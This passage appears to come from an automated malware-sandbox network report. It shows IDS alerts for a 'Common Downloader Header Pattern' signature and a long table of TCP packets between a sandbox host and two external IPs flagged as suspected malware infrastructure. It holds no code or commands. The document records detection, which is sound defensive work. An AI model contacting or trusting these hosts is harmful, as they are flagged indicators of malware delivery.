2024-11-25T08:49:08.523004+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.6.168	80	TCP
2024-11-25T08:49:11.679157+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49735	193.122.6.168	80	TCP
2024-11-25T08:49:15.147801+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	193.122.6.168	80	TCP
2024-11-25T08:49:17.788660+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49737	193.122.6.168	80	TCP
2024-11-25T08:49:19.423365+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	172.67.177.134	443	TCP
2024-11-25T08:49:20.960339+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49748	193.122.6.168	80	TCP
2024-11-25T08:49:22.683340+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49751	172.67.177.134	443	TCP
2024-11-25T08:49:22.938836+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49752	172.67.177.134	443	TCP
2024-11-25T08:49:24.210363+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49754	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 08:49:00.858891010 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:00.978740931 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:00.978890896 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:00.979166985 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:01.098714113 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:02.309218884 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:02.313585997 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:02.433304071 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:02.727622032 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:02.772788048 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:03.222536087 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:03.222644091 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:03.222742081 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:03.231775999 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:03.231817007 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.456110001 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.456312895 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:04.462052107 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:04.462069988 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.462552071 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.507169962 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:04.508999109 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:04.551333904 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.886382103 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.886549950 CET	443	49731	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:04.886620045 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:04.935431957 CET	49731	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:04.957895041 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:05.077723026 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:05.373205900 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:05.376796961 CET	49732	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:05.376907110 CET	443	49732	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:05.377008915 CET	49732	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:05.377283096 CET	49732	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:05.377319098 CET	443	49732	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:05.413558006 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:06.590809107 CET	443	49732	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:06.592447042 CET	49732	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:06.592518091 CET	443	49732	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:07.037159920 CET	443	49732	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:07.037255049 CET	443	49732	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:07.037317038 CET	49732	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:07.037695885 CET	49732	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:07.042990923 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:07.044359922 CET	49733	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:07.163532019 CET	80	49730	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:07.163621902 CET	49730	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:07.163916111 CET	80	49733	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:07.163996935 CET	49733	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:07.164113998 CET	49733	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:07.283659935 CET	80	49733	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:08.477302074 CET	80	49733	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:08.478889942 CET	49734	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:08.478951931 CET	443	49734	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:08.479029894 CET	49734	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:08.479337931 CET	49734	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:08.479357004 CET	443	49734	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:08.523004055 CET	49733	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:09.741775036 CET	443	49734	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:09.744031906 CET	49734	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:09.744117975 CET	443	49734	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:10.195347071 CET	443	49734	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:10.195589066 CET	443	49734	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:10.195652008 CET	49734	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:10.197479010 CET	49734	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:10.201920986 CET	49733	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:10.203110933 CET	49735	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:10.322365999 CET	80	49733	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:10.322457075 CET	49733	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:10.322942972 CET	80	49735	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:10.323020935 CET	49735	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:10.323153973 CET	49735	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:10.442684889 CET	80	49735	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:11.635962963 CET	80	49735	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:11.638217926 CET	49736	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:11.638262033 CET	443	49736	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:11.638341904 CET	49736	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:11.638581038 CET	49736	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:11.638591051 CET	443	49736	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:11.679157019 CET	49735	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:12.900592089 CET	443	49736	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:12.902193069 CET	49736	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:12.902225018 CET	443	49736	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:13.243175983 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:13.357182980 CET	443	49736	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:13.357285023 CET	443	49736	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:13.357342958 CET	49736	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:13.357722044 CET	49736	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:13.361551046 CET	49738	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:13.362999916 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:13.363102913 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:13.363337040 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:13.481189966 CET	80	49738	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:13.481275082 CET	49738	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:13.481395960 CET	49738	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:13.482810020 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:13.601087093 CET	80	49738	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:14.675910950 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:14.679570913 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:14.798762083 CET	80	49738	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:14.799045086 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:14.800093889 CET	49740	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:14.800143003 CET	443	49740	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:14.800209999 CET	49740	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:14.800489902 CET	49740	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:14.800501108 CET	443	49740	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:14.850934029 CET	49738	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:15.093767881 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:15.136830091 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:15.136889935 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:15.136959076 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:15.140532970 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:15.140546083 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:15.147800922 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:16.058008909 CET	443	49740	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.060209990 CET	49740	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.060239077 CET	443	49740	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.445054054 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.445139885 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.446999073 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.447010040 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.447534084 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.491553068 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.497910023 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.510130882 CET	443	49740	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.510204077 CET	443	49740	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.510251999 CET	49740	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.510761976 CET	49740	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:16.514523029 CET	49738	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:16.515561104 CET	49743	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:16.543334961 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:16.634320974 CET	80	49738	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:16.634381056 CET	49738	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:16.635198116 CET	80	49743	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:16.635270119 CET	49743	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:16.635565996 CET	49743	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:16.755264044 CET	80	49743	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:17.320219994 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:17.320302010 CET	443	49741	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:17.320461035 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:17.328351974 CET	49741	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:17.331980944 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:17.454334021 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:17.746926069 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:17.749219894 CET	49744	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:17.749284029 CET	443	49744	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:17.749366999 CET	49744	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:17.749718904 CET	49744	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:17.749735117 CET	443	49744	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:17.788660049 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:18.004749060 CET	80	49743	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:18.006181955 CET	49746	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:18.006237030 CET	443	49746	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:18.006429911 CET	49746	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:18.006705046 CET	49746	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:18.006721973 CET	443	49746	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:18.054069996 CET	49743	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:18.977330923 CET	443	49744	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:18.982522964 CET	49744	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:18.982572079 CET	443	49744	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.318981886 CET	443	49746	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.323225975 CET	49746	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:19.323261976 CET	443	49746	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.423476934 CET	443	49744	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.423753977 CET	443	49744	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.423831940 CET	49744	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:19.424534082 CET	49744	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:19.427527905 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.428438902 CET	49748	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.547401905 CET	80	49737	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:19.547584057 CET	49737	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.547945023 CET	80	49748	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:19.548028946 CET	49748	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.548170090 CET	49748	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.667670012 CET	80	49748	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:19.778711081 CET	443	49746	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.778887033 CET	443	49746	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:19.778970003 CET	49746	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:19.779405117 CET	49746	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:19.783030987 CET	49743	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.783669949 CET	49749	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.902818918 CET	80	49743	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:19.902884960 CET	49743	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.903204918 CET	80	49749	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:19.903280973 CET	49749	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:19.903403044 CET	49749	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:20.022916079 CET	80	49749	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:20.907203913 CET	80	49748	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:20.908536911 CET	49751	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:20.908566952 CET	443	49751	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:20.908648968 CET	49751	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:20.908937931 CET	49751	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:20.908951998 CET	443	49751	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:20.960339069 CET	49748	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:21.217550993 CET	80	49749	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:21.218864918 CET	49752	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:21.218897104 CET	443	49752	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:21.219003916 CET	49752	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:21.219291925 CET	49752	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:21.219302893 CET	443	49752	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:21.272829056 CET	49749	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.218610048 CET	443	49751	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.228236914 CET	49751	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:22.228257895 CET	443	49751	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.481213093 CET	443	49752	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.490643978 CET	49752	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:22.490683079 CET	443	49752	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.683465004 CET	443	49751	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.683648109 CET	443	49751	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.683705091 CET	49751	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:22.684106112 CET	49751	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:22.687969923 CET	49748	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.689445972 CET	49754	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.808064938 CET	80	49748	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:22.808255911 CET	49748	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.808960915 CET	80	49754	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:22.809051991 CET	49754	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.809207916 CET	49754	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.928688049 CET	80	49754	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:22.938874006 CET	443	49752	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.938955069 CET	443	49752	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:22.939002037 CET	49752	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:22.939781904 CET	49752	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:22.947088957 CET	49749	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:22.948559046 CET	49755	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:23.067051888 CET	80	49749	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:23.067112923 CET	49749	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:23.068080902 CET	80	49755	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:23.068154097 CET	49755	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:23.068350077 CET	49755	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:23.187896967 CET	80	49755	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:24.168174982 CET	80	49754	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:24.169737101 CET	49756	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:24.169799089 CET	443	49756	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:24.169996977 CET	49756	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:24.170468092 CET	49756	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:24.170480967 CET	443	49756	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:24.210362911 CET	49754	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:24.334388018 CET	80	49755	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:24.341833115 CET	49757	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:24.341941118 CET	443	49757	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:24.342051029 CET	49757	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:24.342607975 CET	49757	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:24.342647076 CET	443	49757	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:24.382229090 CET	49755	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:25.430742979 CET	443	49756	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:25.440781116 CET	49756	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:25.440819979 CET	443	49756	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:25.601967096 CET	443	49757	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:25.615123034 CET	49757	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:25.615226984 CET	443	49757	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:25.888473034 CET	443	49756	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:25.888559103 CET	443	49756	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:25.888642073 CET	49756	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:25.889276981 CET	49756	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:25.894495010 CET	49758	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:26.014122009 CET	80	49758	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:26.014230967 CET	49758	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:26.014661074 CET	49758	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:26.056317091 CET	443	49757	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:26.056427956 CET	443	49757	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:26.056540012 CET	49757	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:26.074042082 CET	49757	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:26.134157896 CET	80	49758	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:27.327369928 CET	80	49758	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:27.339360952 CET	49759	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:27.339493990 CET	443	49759	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:27.339612007 CET	49759	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:27.339957952 CET	49759	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:27.339994907 CET	443	49759	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:27.382230043 CET	49758	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:28.604439974 CET	443	49759	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:28.606264114 CET	49759	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:28.606348991 CET	443	49759	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:29.057832003 CET	443	49759	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:29.057986021 CET	443	49759	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:29.058048010 CET	49759	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:29.076653957 CET	49759	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:29.236310005 CET	49758	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:29.238188028 CET	49760	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:29.356441021 CET	80	49758	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:29.356503010 CET	49758	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:29.357812881 CET	80	49760	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:29.357887030 CET	49760	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:29.358017921 CET	49760	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:29.477706909 CET	80	49760	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:30.670620918 CET	80	49760	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:30.673969984 CET	49761	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:30.674021006 CET	443	49761	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:30.674128056 CET	49761	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:30.674350977 CET	49761	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:30.674362898 CET	443	49761	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:30.726109028 CET	49760	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:31.933355093 CET	443	49761	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:31.953332901 CET	49761	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:31.953365088 CET	443	49761	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:32.390075922 CET	443	49761	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:32.390244961 CET	443	49761	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:32.390408039 CET	49761	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:32.390707970 CET	49761	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:32.393881083 CET	49760	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:32.395051003 CET	49762	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:32.513892889 CET	80	49760	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:32.513988972 CET	49760	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:32.514643908 CET	80	49762	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:32.514719963 CET	49762	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:32.514848948 CET	49762	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:32.634355068 CET	80	49762	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:33.780957937 CET	80	49762	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:33.784873962 CET	49763	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:33.784928083 CET	443	49763	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:33.785020113 CET	49763	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:33.785267115 CET	49763	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:33.785288095 CET	443	49763	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:33.835359097 CET	49762	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:35.053062916 CET	443	49763	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:35.054703951 CET	49763	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:35.054738998 CET	443	49763	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:35.507380962 CET	443	49763	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:35.507555008 CET	443	49763	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:35.507637024 CET	49763	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:35.508064032 CET	49763	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:35.511130095 CET	49762	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:35.512293100 CET	49764	80	192.168.2.4	193.122.6.168
